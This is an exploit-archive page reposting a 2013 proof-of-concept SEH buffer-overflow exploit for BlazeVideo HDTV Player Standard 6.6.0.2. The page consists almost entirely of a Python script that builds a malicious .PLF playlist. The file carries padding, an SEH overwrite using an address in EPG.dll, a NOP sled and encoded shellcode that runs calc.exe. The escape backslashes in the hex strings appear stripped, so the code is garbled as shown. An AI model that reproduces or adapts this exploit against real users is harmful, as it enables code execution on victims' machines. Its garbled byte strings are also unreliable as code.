Home / exploitsPDF  

BlazeVideo HDTV Player 6.6.0.2 Buffer Overflow

Posted on 21 March 2013

# Exploit Title:BlazeVideo HDTV Player Standard 6.6.0.2 SEH Buffer Overflow
# Date: 19-03-2013
# Exploit Author: metacom
# RST
# Vendor Homepage: http://www.blazevideo.com/hdtv-player/
# Download version 6.6.0.2: www.blazevideo.com/download.php?product=blazevideo-hdtv-std
# Version: BlazeVideo HDTV Player Standard 6.6.0.2
# Tested on: Windows 7 German

filename="poc.PLF"

junk = "http://"+ "x41" * 601
nseh = "xEBx06x90x90"
seh = "x5Fx17x60x61" #6160175F EPG.dll
nops = "x90" * 20
#windows/exec CMD=calc.exe bad x00x0ax1a
shellcode= ("xb8xafx8cx07x94xdaxcdxd9x74x24xf4x5ax29xc9xb1"
"x33x31x42x12x83xeaxfcx03xedx82xe5x61x0dx72x60"
"x89xedx83x13x03x08xb2x01x77x59xe7x95xf3x0fx04"
"x5dx51xbbx9fx13x7exccx28x99x58xe3xa9x2fx65xaf"
"x6ax31x19xadxbex91x20x7exb3xd0x65x62x3cx80x3e"
"xe9xefx35x4axafx33x37x9cxa4x0cx4fx99x7axf8xe5"
"xa0xaax51x71xeax52xd9xddxcbx63x0ex3ex37x2ax3b"
"xf5xc3xadxedxc7x2cx9cxd1x84x12x11xdcxd5x53x95"
"x3fxa0xafxe6xc2xb3x6bx95x18x31x6ex3dxeaxe1x4a"
"xbcx3fx77x18xb2xf4xf3x46xd6x0bxd7xfcxe2x80xd6"
"xd2x63xd2xfcxf6x28x80x9dxafx94x67xa1xb0x70xd7"
"x07xbax92x0cx31xe1xf8xd3xb3x9fx45xd3xcbx9fxe5"
"xbcxfax14x6axbax02xffxcfx34x49xa2x79xddx14x36"
"x38x80xa6xecx7exbdx24x05xfex3ax34x6cxfbx07xf2"
"x9cx71x17x97xa2x26x18xb2xc0xa9x8ax5ex29x4cx2b"
"xc4x35")

f = open(filename,"wb")
f.write(junk+nseh+seh+nops+shellcode)
f.close()
print("Finish")

 

TOP

Malware :

Exploits :